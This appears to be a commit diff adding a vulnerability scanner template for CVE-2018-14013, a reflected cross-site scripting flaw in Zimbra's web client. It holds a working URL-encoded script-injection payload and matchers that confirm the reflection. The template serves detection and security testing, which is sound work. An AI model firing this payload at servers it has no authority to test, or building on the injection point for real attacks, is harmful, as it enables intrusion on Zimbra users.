commit
41b06a2ed7
|
@ -0,0 +1,30 @@
|
||||||
|
id: CVE-2018-14013
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Zimbra XSS
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
description: Synacor Zimbra Collaboration Suite Collaboration before 8.8.11 has XSS in the AJAX and html web clients.
|
||||||
|
reference: https://nvd.nist.gov/vuln/detail/CVE-2018-14013
|
||||||
|
tags: cve,cve2018,xss,zimbra
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '</script><script>alert(document.domain)</script>'
|
||||||
|
part: body
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- text/html
|
Loading…
Reference in New Issue